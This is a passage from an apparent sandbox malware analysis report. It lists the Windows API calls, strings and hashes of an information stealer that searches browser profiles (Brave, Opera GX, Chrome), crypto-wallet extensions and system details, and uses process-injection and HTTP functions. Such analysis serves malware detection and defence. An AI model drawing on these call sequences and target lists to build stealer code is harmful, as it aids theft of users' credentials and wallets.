StrCmpCA 74426->74420 74426->74432 74427 33ac9 StrCmpCA 74427->74420 74427->74432 74428 33a9f StrCmpCA 
74428->74420 74428->74432 74429 33ade StrCmpCA 74429->74420 74430 33a3d StrCmpCA 74430->74420 74430->74432 74431 30549 2 API calls 74431->74432 74432->74420 74432->74421 74432->74422 74432->74423 74432->74424 74432->74425 74432->74426 74432->74427 74432->74428 74432->74429 74432->74430 74432->74431 74434 30519 lstrcpyA 74433->74434 74435 25f64 74434->74435 74436 24ab6 5 API calls 74435->74436 74437 25f70 74436->74437 74438 304e7 lstrcpyA 74437->74438 74439 25f8c 74438->74439 74440 304e7 lstrcpyA 74439->74440 74441 25f9c 74440->74441 74442 304e7 lstrcpyA 74441->74442 74443 25fac 74442->74443 74444 304e7 lstrcpyA 74443->74444 74445 25fbc 74444->74445 74446 304e7 lstrcpyA 74445->74446 74447 25fcc InternetOpenA StrCmpCA 74446->74447 74448 26000 74447->74448 74449 266ff InternetCloseHandle 74448->74449 74451 31c4a 7 API calls 74448->74451 75512 28048 CryptStringToBinaryA 74449->75512 74453 26020 74451->74453 74454 305c7 2 API calls 74453->74454 74456 26033 74454->74456 74455 30549 2 API calls 74458 26739 74455->74458 74457 3058d lstrcpyA 74456->74457 74462 2603e 74457->74462 74459 30609 3 API calls 74458->74459 74460 26750 74459->74460 74461 3058d lstrcpyA 74460->74461 74467 2675b 74461->74467 74463 30609 3 API calls 74462->74463 74464 2606a 74463->74464 74465 3058d lstrcpyA 74464->74465 74466 26075 74465->74466 74470 30609 3 API calls 74466->74470 74468 3d016 __crtGetStringTypeA_stat 5 API calls 74467->74468 74469 267eb 74468->74469 74600 3343f strtok_s 74469->74600 74471 26096 74470->74471 74472 3058d lstrcpyA 74471->74472 74473 260a1 74472->74473 74474 305c7 2 API calls 74473->74474 74475 260c3 74474->74475 74476 3058d lstrcpyA 74475->74476 74477 260ce 74476->74477 74478 30609 3 API calls 74477->74478 74479 260ef 74478->74479 74480 3058d lstrcpyA 74479->74480 74481 260fa 74480->74481 74482 30609 3 API calls 74481->74482 74483 2611b 74482->74483 74484 3058d lstrcpyA 74483->74484 74485 26126 74484->74485 74486 30609 3 API calls 74485->74486 74487 26148 74486->74487 

Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll

APIs
• wsprintfA.USER32 ref: 00034D1C
• FindFirstFileA.KERNEL32(?,?), ref: 00034D33
• _memset.LIBCMT ref: 00034D4F
• _memset.LIBCMT ref: 00034D60
• StrCmpCA.SHLWAPI(?,000569F8), ref: 00034D81
• StrCmpCA.SHLWAPI(?,000569FC), ref: 00034D9B
• wsprintfA.USER32 ref: 00034DC2
• StrCmpCA.SHLWAPI(?,0005660F), ref: 00034DD6
• wsprintfA.USER32 ref: 00034DFF
• wsprintfA.USER32 ref: 00034E16
  • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
  • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
  • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
  • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
  • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
  • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
• _memset.LIBCMT ref: 00034E28
• lstrcatA.KERNEL32(?,?), ref: 00034E3D
• strtok_s.MSVCRT ref: 00034E82
• _memset.LIBCMT ref: 00034E94
• lstrcatA.KERNEL32(?,?), ref: 00034EA9
• strtok_s.MSVCRT ref: 00034EC2
• PathMatchSpecA.SHLWAPI(?,00000000), ref: 00034ED7
• DeleteFileA.KERNEL32(?,00056A28,0005661D), ref: 00034F90
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00034FA0
                                                                                                                                                                                            • Part of subcall function 00032166: CreateFileA.KERNEL32(00034FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00034FAC,?), ref: 00032181
                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00034FB6
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00034FC1
                                                                                                                                                                                          • strtok_s.MSVCRT ref: 00034FE7
                                                                                                                                                                                          • FindNextFileA.KERNELBASE(?,?), ref: 00035105
                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00035125
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                                          • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                          • API String ID: 956187361-332874205
                                                                                                                                                                                          • Opcode ID: a7dabdfad92583f61ecabe8ef5e6b0d17a3605d44d031f034825ff01882c2be8
                                                                                                                                                                                          • Instruction ID: 59e91f4e12380f75a0933befdf33c74c524607406ab3d4a4b3d2bdfa86a932d6
                                                                                                                                                                                          • Opcode Fuzzy Hash: a7dabdfad92583f61ecabe8ef5e6b0d17a3605d44d031f034825ff01882c2be8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 36C11DB1D0022AABDF22AB60EC499EE777CAF08305F4145E5FA09B7151DB319F858F61

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,000567F2,000567EF,00057324,000567EE,?,?,?), ref: 00029DC6
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00057328), ref: 00029DE7
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,0005732C), ref: 00029E01
                                                                                                                                                                                            • Part of subcall function 00030549: lstrlenA.KERNEL32(?,?,00037174,000566CF,000566CE,?,?,?,?,0003858F), ref: 0003054F
                                                                                                                                                                                            • Part of subcall function 00030549: lstrcpyA.KERNEL32(00000000,00000000,?,00037174,000566CF,000566CE,?,?,?,?,0003858F), ref: 00030581
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Opera GX,00057330,?,000567F3), ref: 00029E93
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Brave,00057350,00057354,00057330,?,000567F3), ref: 0002A015
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 0002A02F
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0002A0EF
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0002A1BE
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 0002A1FC
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 0002A266
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(0002CCE9), ref: 0002A279
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 0002A35C
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0002A41C
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0002A4C1
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0002A522
                                                                                                                                                                                            • Part of subcall function 00028DDB: lstrlenA.KERNEL32(?), ref: 00028FD4
                                                                                                                                                                                            • Part of subcall function 00028DDB: lstrlenA.KERNEL32(?), ref: 00028FEF
                                                                                                                                                                                            • Part of subcall function 00029549: lstrlenA.KERNEL32(?), ref: 00029970
                                                                                                                                                                                            • Part of subcall function 00029549: lstrlenA.KERNEL32(?), ref: 0002998B
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 0002A553
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0002A613
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0002A6AA
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                          • FindNextFileA.KERNELBASE(?,?), ref: 0002A76E
                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 0002A782
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
                                                                                                                                                                                          • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                                                          • API String ID: 4173076446-1189830961
                                                                                                                                                                                          • Opcode ID: a0ff805bedfd56b8b37d4b9c88c7f98be3f60600ff6623a184199524992e0793
                                                                                                                                                                                          • Instruction ID: 99410cf32b15d49f58f48a18f655259326fd6dce1d5efd26162af4242858b960
                                                                                                                                                                                          • Opcode Fuzzy Hash: a0ff805bedfd56b8b37d4b9c88c7f98be3f60600ff6623a184199524992e0793
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D42FA3290112DABCF62FB64ED4ABCD7775AF04314F4501E1B908A7122DB31AE999F91

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(6C49F688,00001000), ref: 6C4135D5
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C4135E0
                                                                                                                                                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 6C4135FD
                                                                                                                                                                                          • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C41363F
                                                                                                                                                                                          • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C41369F
                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 6C4136E4
                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 6C413773
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(6C49F688), ref: 6C41377E
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(6C49F688), ref: 6C4137BD
                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 6C4137C4
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(6C49F688), ref: 6C4137CB
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(6C49F688), ref: 6C413801
                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 6C413883
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C413902
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C413918
                                                                                                                                                                                          • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C41394C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • QPC, xrefs: 6C4138FC
                                                                                                                                                                                          • ZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxU, xrefs: 6C413868, 6C413873
                                                                                                                                                                                          • AuthcAMDenti, xrefs: 6C413946
                                                                                                                                                                                          • MOZ_TIMESTAMP_MODE, xrefs: 6C4135DB
                                                                                                                                                                                          • GTC, xrefs: 6C413912
                                                                                                                                                                                          • GenuntelineI, xrefs: 6C413639
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                                          • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC$ZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxU
                                                                                                                                                                                          • API String ID: 301339242-2808244485
                                                                                                                                                                                          • Opcode ID: be8f19c8d45bd20c7f24d0939156e85123bd056d74f0bf20f5b22d9ec046d1cb
                                                                                                                                                                                          • Instruction ID: eea254f550364afa130a3547df552fcf67f9bfdd13aad9b8ffcbeffb75cb7ce5
                                                                                                                                                                                          • Opcode Fuzzy Hash: be8f19c8d45bd20c7f24d0939156e85123bd056d74f0bf20f5b22d9ec046d1cb
                                                                                                                                                                                          • Instruction Fuzzy Hash: DCB18171B093209FEB08EF29C844F2A7BF9BB99705F15892DF899D3750D67099058B81

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                                                                                          • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                          • API String ID: 2178766154-445461498
                                                                                                                                                                                          • Opcode ID: 2ce864b1324a9e35429d4b3b358be7c3bb5b64f8462cbfc5fbc1a3c652c1ff11
                                                                                                                                                                                          • Instruction ID: da18715862cd5c8170810cda203899e991d058b02fdaeacc0355ccd920bed2c8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ce864b1324a9e35429d4b3b358be7c3bb5b64f8462cbfc5fbc1a3c652c1ff11
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8081197190022DABCF61EB60EC4AACE77B8FF08305F4585E5E548A7151DF31AA898F91
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0003180E
                                                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000000,0000004C,00033EF9,Install Date: ,000568B0,00000000,Windows: ,000568A0,Work Dir: In memory,00056888), ref: 0003181F
                                                                                                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00031830
                                                                                                                                                                                          • CoCreateInstance.OLE32(00052F00,00000000,00000001,00052E30,?), ref: 0003184A
                                                                                                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00031880
                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 000318DB
                                                                                                                                                                                            • Part of subcall function 00031757: __EH_prolog3_catch.LIBCMT ref: 0003175E
                                                                                                                                                                                            • Part of subcall function 00031757: CoCreateInstance.OLE32(000531B0,00000000,00000001,0005AF60,?,00000018,00031901,?), ref: 00031781
                                                                                                                                                                                            • Part of subcall function 00031757: SysAllocString.OLEAUT32(?), ref: 0003178E
                                                                                                                                                                                            • Part of subcall function 00031757: _wtoi64.MSVCRT ref: 000317C1
                                                                                                                                                                                            • Part of subcall function 00031757: SysFreeString.OLEAUT32(?), ref: 000317DA
                                                                                                                                                                                            • Part of subcall function 00031757: SysFreeString.OLEAUT32(00000000), ref: 000317E1
                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0003190A
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00031916
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0003191D
                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0003195C
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00031949
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                          • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: /$UT
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AE8
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AEE
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AF4
                                                                                                                                                                                            • Part of subcall function 00024AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00024B06
                                                                                                                                                                                            • Part of subcall function 00024AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00024B0E
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000269C5
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 000269DF
                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00026A0E
                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00026A4D
                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00026A7D
                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00026A88
                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00026AAC
                                                                                                                                                                                          • InternetReadFile.WININET(?,?,000007CF,?), ref: 00026B40
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00026B50
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00026B5C
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00026B68
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                                                          • String ID: ERROR$ERROR$GET
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,0005A9AC,0005A9B0,000569FA,000569F7,00037908,?,00000000), ref: 00021FA4
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,0005A9B4), ref: 00021FD7
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,0005A9B8), ref: 00021FF1
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,0005A9BC,0005A9C0,?,0005A9C4,000569FB), ref: 000220DD
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 000222C3
                                                                                                                                                                                            • Part of subcall function 00031DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00031DFD
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00022336
                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 000223A2
                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 000223B6
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 000225DC
                                                                                                                                                                                            • Part of subcall function 00027FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0002E756,?,?,?), ref: 00027FC7
                                                                                                                                                                                            • Part of subcall function 00027FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0002E756,?,?,?), ref: 00027FDE
                                                                                                                                                                                            • Part of subcall function 00027FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0002E756,?,?,?), ref: 00027FF5
                                                                                                                                                                                            • Part of subcall function 00027FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0002E756,?,?,?), ref: 0002800C
                                                                                                                                                                                            • Part of subcall function 00027FAC: CloseHandle.KERNEL32(?,?,?,?,?,0002E756,?,?,?), ref: 00028034
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0002264F
                                                                                                                                                                                            • Part of subcall function 00036E97: Sleep.KERNEL32(000003E8,?,?), ref: 00036EFE
                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 000226C6
                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 000226DA
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00036E97: CreateThread.KERNEL32(00000000,00000000,00036DC6,?,00000000,00000000), ref: 00036F36
                                                                                                                                                                                            • Part of subcall function 00036E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00036F3E
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 00031D92: GetFileAttributesA.KERNEL32(?,?,?,0002DA7F,?,?,?), ref: 00031D99
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                                          • API String ID: 1475085387-1173974218
                                                                                                                                                                                          • Opcode ID: 88f3205139a102b0d1ca0a995b697ff966a6cd22056858cffb9935f747ca9d5e
                                                                                                                                                                                          • Instruction ID: 6c9d7d8cfc38a19f118cf9094d49f84ff6f112daaf5bbdc09fea2e84bd021ac9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 88f3205139a102b0d1ca0a995b697ff966a6cd22056858cffb9935f747ca9d5e
                                                                                                                                                                                          • Instruction Fuzzy Hash: B932B971941139ABCF62FB64ED56ACDB378AF44304F4141E1B908B7166DB30AF898F91
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wsprintfA.USER32 ref: 0003546A
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 00035481
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00056A80), ref: 000354A2
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00056A84), ref: 000354BC
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 0003550D
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00035520
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00035534
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00035547
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00056A88), ref: 00035559
